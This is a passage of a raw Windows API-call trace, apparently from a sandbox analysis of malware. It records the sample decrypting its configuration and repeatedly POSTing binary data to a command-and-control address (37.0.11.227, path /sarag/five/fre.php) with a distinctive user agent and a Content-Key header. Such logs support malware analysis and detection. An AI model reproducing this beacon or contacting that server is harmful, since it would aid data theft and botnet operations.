LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0161.451] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0161.451] GetProcessHeap () returned 0x690000 [0161.452] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0161.452] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0161.453] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0161.454] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0161.454] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0161.455] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0161.455] CryptReleaseContext (hProv=0x6abd08, dwFlags=0x0) returned 1 [0161.455] GetProcessHeap () returned 0x690000 [0161.455] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0161.456] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0161.456] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0161.457] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0161.458] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0161.458] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0161.458] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0161.459] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0161.459] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0161.459] GetProcessHeap () returned 0x690000 [0161.459] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0161.459] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3240*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0161.459] GetProcessHeap () returned 0x690000 [0161.459] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab330 [0161.459] socket (af=2, type=1, protocol=6) returned 0x258 [0161.460] connect (s=0x258, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0161.492] FreeAddrInfoW (pAddrInfo=0x6a3240*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0161.492] GetProcessHeap () returned 0x690000 [0161.492] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6ac130 [0161.492] GetProcessHeap () returned 0x690000 [0161.492] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0161.493] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0161.494] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0161.494] GetProcessHeap () returned 0x690000 [0161.494] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6ac1b8 [0161.494] GetProcessHeap () returned 0x690000 [0161.495] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0161.495] GetProcessHeap () returned 0x690000 [0161.495] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0161.495] GetProcessHeap () returned 0x690000 [0161.495] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0161.496] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0161.497] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0161.497] GetProcessHeap () returned 0x690000 [0161.497] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ac278 [0161.497] GetProcessHeap () returned 0x690000 [0161.498] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0161.498] send (s=0x258, buf=0x6ac278*, len=242, flags=0) returned 242 [0161.499] send (s=0x258, buf=0x6aba40*, len=159, flags=0) returned 159 [0161.499] GetProcessHeap () returned 0x690000 [0161.499] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6a4fc8 [0161.499] recv (in: s=0x258, buf=0x6a4fc8, len=4048, flags=0 | out: buf=0x6a4fc8*) returned 204 [0161.572] GetProcessHeap () returned 0x690000 [0161.572] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac278 | out: hHeap=0x690000) returned 1 [0161.572] GetProcessHeap () returned 0x690000 [0161.573] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0161.573] GetProcessHeap () returned 0x690000 [0161.573] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac1b8 | out: hHeap=0x690000) returned 1 [0161.573] GetProcessHeap () returned 0x690000 [0161.574] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac130 | out: hHeap=0x690000) returned 1 [0161.574] closesocket (s=0x258) returned 0 [0161.576] GetProcessHeap () returned 0x690000 [0161.576] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab330 | out: hHeap=0x690000) returned 1 [0161.576] GetProcessHeap () returned 0x690000 [0161.577] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0161.577] GetProcessHeap () returned 0x690000 [0161.577] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0161.577] GetProcessHeap () returned 0x690000 [0161.578] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0161.578] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6a4fc8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xfdc) returned 0x258 [0161.582] Sleep (dwMilliseconds=0xea60) [0171.933] GetProcessHeap () returned 0x690000 [0171.933] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0171.939] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0171.940] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0171.966] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0171.967] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6abd08) returned 1 [0171.981] GetProcessHeap () returned 0x690000 [0171.981] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0171.981] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0171.982] CryptImportKey (in: hProv=0x6abd08, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0171.983] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0171.985] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0171.986] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0171.987] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0171.987] GetProcessHeap () returned 0x690000 [0171.987] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0172.009] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.010] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0172.014] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.015] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0172.019] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.019] CryptReleaseContext (hProv=0x6abd08, dwFlags=0x0) returned 1 [0172.020] GetProcessHeap () returned 0x690000 [0172.020] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0172.020] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0172.021] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0172.021] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0172.022] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0172.022] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0172.023] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0172.023] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0172.024] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0172.024] GetProcessHeap () returned 0x690000 [0172.024] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0172.038] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0172.040] GetProcessHeap () returned 0x690000 [0172.040] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0172.040] GetProcessHeap () returned 0x690000 [0172.041] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0172.041] GetProcessHeap () returned 0x690000 [0172.041] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0172.041] GetProcessHeap () returned 0x690000 [0172.041] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0172.042] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.043] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0172.053] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.053] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6abd08) returned 1 [0172.062] GetProcessHeap () returned 0x690000 [0172.062] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0172.063] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.063] CryptImportKey (in: hProv=0x6abd08, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d028) returned 1 [0172.064] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.065] CryptSetKeyParam (hKey=0x69d028, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0172.065] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.066] CryptSetKeyParam (hKey=0x69d028, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0172.066] GetProcessHeap () returned 0x690000 [0172.066] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0172.071] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.071] CryptDecrypt (in: hKey=0x69d028, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0172.072] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.072] CryptDestroyKey (hKey=0x69d028) returned 1 [0172.073] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.073] CryptReleaseContext (hProv=0x6abd08, dwFlags=0x0) returned 1 [0172.074] GetProcessHeap () returned 0x690000 [0172.074] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0172.074] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0172.075] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0172.076] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0172.076] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0172.077] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0172.077] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0172.078] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0172.078] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0172.078] GetProcessHeap () returned 0x690000 [0172.078] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0172.079] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3290*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0172.079] GetProcessHeap () returned 0x690000 [0172.079] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4c0 [0172.079] socket (af=2, type=1, protocol=6) returned 0x260 [0172.080] connect (s=0x260, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0172.110] FreeAddrInfoW (pAddrInfo=0x6a3290*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0172.110] GetProcessHeap () returned 0x690000 [0172.110] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6ac130 [0172.110] GetProcessHeap () returned 0x690000 [0172.110] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0172.112] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0172.115] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0172.115] GetProcessHeap () returned 0x690000 [0172.115] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6ac1b8 [0172.115] GetProcessHeap () returned 0x690000 [0172.116] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0172.116] GetProcessHeap () returned 0x690000 [0172.116] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0172.116] GetProcessHeap () returned 0x690000 [0172.116] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0172.117] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0172.118] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0172.118] GetProcessHeap () returned 0x690000 [0172.118] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ac278 [0172.118] GetProcessHeap () returned 0x690000 [0172.118] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0172.118] send (s=0x260, buf=0x6ac278*, len=242, flags=0) returned 242 [0172.119] send (s=0x260, buf=0x6aba40*, len=159, flags=0) returned 159 [0172.119] GetProcessHeap () returned 0x690000 [0172.119] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6a4fc8 [0172.119] recv (in: s=0x260, buf=0x6a4fc8, len=4048, flags=0 | out: buf=0x6a4fc8*) returned 204 [0172.190] GetProcessHeap () returned 0x690000 [0172.190] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac278 | out: hHeap=0x690000) returned 1 [0172.190] GetProcessHeap () returned 0x690000 [0172.191] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0172.191] GetProcessHeap () returned 0x690000 [0172.191] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac1b8 | out: hHeap=0x690000) returned 1 [0172.192] GetProcessHeap () returned 0x690000 [0172.192] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac130 | out: hHeap=0x690000) returned 1 [0172.192] closesocket (s=0x260) returned 0 [0172.194] GetProcessHeap () returned 0x690000 [0172.194] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4c0 | out: hHeap=0x690000) returned 1 [0172.194] GetProcessHeap () returned 0x690000 [0172.194] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0172.194] GetProcessHeap () returned 0x690000 [0172.194] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0172.195] GetProcessHeap () returned 0x690000 [0172.195] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0172.196] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6a4fc8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xc7c) returned 0x260 [0172.198] Sleep (dwMilliseconds=0xea60) [0172.200] GetProcessHeap () returned 0x690000 [0172.200] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0172.201] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.201] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0172.213] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.213] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6abd08) returned 1 [0172.241] GetProcessHeap () returned 0x690000 [0172.241] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0172.242] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.242] CryptImportKey (in: hProv=0x6abd08, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0172.243] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.244] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0172.244] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.245] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0172.245] GetProcessHeap () returned 0x690000 [0172.245] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0172.246] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.247] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0172.247] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.250] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0172.251] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.251] CryptReleaseContext (hProv=0x6abd08, dwFlags=0x0) returned 1 [0172.251] GetProcessHeap () returned 0x690000 [0172.251] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0172.252] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0172.253] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0172.253] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0172.254] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0172.255] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0172.255] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0172.256] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0172.256] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0172.256] GetProcessHeap () returned 0x690000 [0172.256] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0172.256] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0172.257] GetProcessHeap () returned 0x690000 [0172.257] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0172.257] GetProcessHeap () returned 0x690000 [0172.258] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0172.258] GetProcessHeap () returned 0x690000 [0172.258] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0172.258] GetProcessHeap () returned 0x690000 [0172.258] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0172.262] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.263] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0172.271] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.272] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6abd08) returned 1 [0172.280] GetProcessHeap () returned 0x690000 [0172.280] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8790 [0172.283] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.283] CryptImportKey (in: hProv=0x6abd08, pbData=0x6a8790, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0172.284] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.284] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0172.285] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.286] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0172.286] GetProcessHeap () returned 0x690000 [0172.286] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8790 | out: hHeap=0x690000) returned 1 [0172.321] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.322] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0172.323] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.323] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0172.324] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.325] CryptReleaseContext (hProv=0x6abd08, dwFlags=0x0) returned 1 [0172.325] GetProcessHeap () returned 0x690000 [0172.325] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0172.326] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0172.326] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0172.327] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0172.328] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", 